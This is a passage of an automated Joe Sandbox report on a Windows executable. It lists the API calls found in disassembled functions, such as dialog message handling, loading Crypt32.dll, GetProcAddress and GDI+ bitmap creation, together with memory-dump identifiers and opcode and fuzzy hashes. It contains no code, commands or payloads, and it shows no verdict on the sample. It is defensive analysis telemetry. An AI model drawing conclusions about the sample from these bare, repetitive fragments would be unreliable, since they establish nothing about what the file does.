                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                    • Opcode ID: fc0414aa155cf0d9e13d1b699927ea646ce2723ae54ea937e6b740c4eef2646b
                                                                                                                                    • Instruction ID: 05c072e5270a6f92ef7167b9af5240e5b6eeb23deb3e9d05c083ca8145ae3ec2
                                                                                                                                    • Opcode Fuzzy Hash: fc0414aa155cf0d9e13d1b699927ea646ce2723ae54ea937e6b740c4eef2646b
                                                                                                                                    • Instruction Fuzzy Hash: EEE092755001245BCB22AB64CC05BD9B75CAB083E1F048661FD55E7294D771DE84CAA0
                                                                                                                                    APIs
                                                                                                                                    • _swprintf.LIBCMT ref: 0037DEEC
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0037DF03
                                                                                                                                      • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                                                                      • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                                                                      • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
                                                                                                                                      • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                                                                      • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2718869927-0
                                                                                                                                    • Opcode ID: 8e5a1159b93ee6583e736e7d3a7e9b2985ef7142f9d3b5210a58bddc38d4bff6
                                                                                                                                    • Instruction ID: 3f7af4a7594b68f9a0cc47c354924d630004372ecd4bdfa210694e943d005ff8
                                                                                                                                    • Opcode Fuzzy Hash: 8e5a1159b93ee6583e736e7d3a7e9b2985ef7142f9d3b5210a58bddc38d4bff6
                                                                                                                                    • Instruction Fuzzy Hash: 83E092B64002486ADF13BB65DC0AFDE3B6C5B0A789F048851B244DE0A2EA78EA108761
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                    • Opcode ID: c7d168612bfed8e71536ad8091bfe59124959445d3ca07a239b7389a3e81a596
                                                                                                                                    • Instruction ID: 686b63710b6f57fac7cefc771747b71d8dc7b6aae18b1ededbc5334c64126bd1
                                                                                                                                    • Opcode Fuzzy Hash: c7d168612bfed8e71536ad8091bfe59124959445d3ca07a239b7389a3e81a596
                                                                                                                                    • Instruction Fuzzy Hash: F1E048B64001187BDB12AB94DC09FDB77ACEF0D3D1F044066B649D6104D674DA84CBB0
                                                                                                                                    APIs
                                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
                                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0037A3E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1918208029-0
                                                                                                                                    • Opcode ID: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
                                                                                                                                    • Instruction ID: a6c84e2803e519dc82ee7bb83ed93890e2fc68e85bf49e1cb82ec5551a2e9f50
                                                                                                                                    • Opcode Fuzzy Hash: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
                                                                                                                                    • Instruction Fuzzy Hash: A8E01275504218EFDB21DF95C541B9DBBF8EF08364F10C05AE89A97201E378AE04DB91
                                                                                                                                    APIs
                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382BAA
                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00382BB5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1660781231-0
                                                                                                                                    • Opcode ID: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
                                                                                                                                    • Instruction ID: 5c5042bea5b9c8a7e846932b408a099aa63517fe796fb6499062721784d0556b
                                                                                                                                    • Opcode Fuzzy Hash: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
                                                                                                                                    • Instruction Fuzzy Hash: 7DD02235156300188C1B7EB028039CB3789AD41F70BB146CBF821CD9C1EE218480A312
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemShowWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3351165006-0
                                                                                                                                    • Opcode ID: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
                                                                                                                                    • Instruction ID: 642534c231ee3f0fab6cfc6a81c90395f597a8a9220eb5780168e8c42d73efbe
                                                                                                                                    • Opcode Fuzzy Hash: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
                                                                                                                                    • Instruction Fuzzy Hash: E6C0127209C200BECB022BB4DC09C2BBBBCEBA5312F08C908B0A5C0060C238C110DB11
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
                                                                                                                                    • Instruction ID: df4eeaec943d2c50888295dd44a8a6af745ebc6465786adfe31da15cd7fcb09f
                                                                                                                                    • Opcode Fuzzy Hash: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
                                                                                                                                    • Instruction Fuzzy Hash: AAC1BF70A002549FEF16CF68C488BBD7BA5AF05310F0D81BAEC469F39ADB719944CB61
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 0c7bf5b85da8bf7c8a02b31435b85289f7037c120b956df56db12659230c0d5a
                                                                                                                                    • Instruction ID: 852ee0792818c39739f6b608c5cd88da2ab3cf2109ddbce3a56f3cd1cd73d1f1
                                                                                                                                    • Opcode Fuzzy Hash: 0c7bf5b85da8bf7c8a02b31435b85289f7037c120b956df56db12659230c0d5a
                                                                                                                                    • Instruction Fuzzy Hash: 5F71D271500F449EDB37DB70C8519E7B7E9AF14301F41892EF2AB8B246DA326A84DF21
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00368289
                                                                                                                                      • Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1
                                                                                                                                      • Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2506663941-0
                                                                                                                                    • Opcode ID: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
                                                                                                                                    • Instruction ID: f44fe1f63c69049e6983b60d91df743f6d167ef8fb38bcc620dca63c61033cd8
                                                                                                                                    • Opcode Fuzzy Hash: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
                                                                                                                                    • Instruction Fuzzy Hash: 8D41F9759046589ADB32DB60CC55BEAB3B8AF04304F0485EBE08A9B187EF755FC4CB10
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 003613E1
                                                                                                                                      • Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C
                                                                                                                                      • Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45
                                                                                                                                      • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 09e94e31d47edddfc2728659294fa482bf17b46703084017c262f6c5b8173c25
                                                                                                                                    • Instruction ID: 3acfd6a2745849b09fef22d5d01869db45419aff3e366f8a58279248eae3f2db
                                                                                                                                    • Opcode Fuzzy Hash: 09e94e31d47edddfc2728659294fa482bf17b46703084017c262f6c5b8173c25
                                                                                                                                    • Instruction Fuzzy Hash: 794148B0905B409EE725CF398885AE6FBE5BF19300F54892ED5EF87282CB316654CB10
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 003613E1
                                                                                                                                      • Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C
                                                                                                                                      • Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45
                                                                                                                                      • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 93711f228ce68a9db6c94de85b7376c7ffd68cb08a23b9899a5374813bfc303e
                                                                                                                                    • Instruction ID: b902abae1458b831d1f99f5a919e3fedcf95c50d946535c222eb6fd1b12b20e8
                                                                                                                                    • Opcode Fuzzy Hash: 93711f228ce68a9db6c94de85b7376c7ffd68cb08a23b9899a5374813bfc303e
                                                                                                                                    • Instruction Fuzzy Hash: 384167B0905B409EE725CF398885AE6FBE5BF19300F54892ED5FF87282CB326654CB10
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0037B098
                                                                                                                                      • Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 259e3c23b6d9723540861f37ffb233ba49b7135177bc8b29b17fbbd1e34ad50a
                                                                                                                                    • Instruction ID: 62f1c4d7fb7931f6a0e5ef5785234b0ae3768f064c157b6f9b0bc25664ef7933
                                                                                                                                    • Opcode Fuzzy Hash: 259e3c23b6d9723540861f37ffb233ba49b7135177bc8b29b17fbbd1e34ad50a
                                                                                                                                    • Instruction Fuzzy Hash: F6318F75C04249DFCF26DF64C851AEEBBB4AF09304F54849EE409BB242DB39AE04CB61
                                                                                                                                    APIs
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0038ACF8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                    • Opcode ID: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
                                                                                                                                    • Instruction ID: 068b0710dbe4751864673055225037762e607bc6dcac7a6dd2e94d1522d9cc6c
                                                                                                                                    • Opcode Fuzzy Hash: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
                                                                                                                                    • Instruction Fuzzy Hash: CB110A33600B255FBB23EE28DC5095A73ADAB84720B1741A2FD15EB654D731EC0187D2
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
                                                                                                                                    • Instruction ID: 29b4cb72f5695f91d94a7ef1c25683564af1a02222b3be54a1f39fd7af1b1a4c
                                                                                                                                    • Opcode Fuzzy Hash: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
                                                                                                                                    • Instruction Fuzzy Hash: 07016537D00528ABCF23ABA8CD91ADEB735AF89750F05C516E816BF256DA348D04C6A0
                                                                                                                                    APIs
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00383C3F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                    • Opcode ID: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
                                                                                                                                    • Instruction ID: e2577761f3cc48dd79a4c6a910ad1bb55afc80913deeecc9eb0e40b8379de56f
                                                                                                                                    • Opcode Fuzzy Hash: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
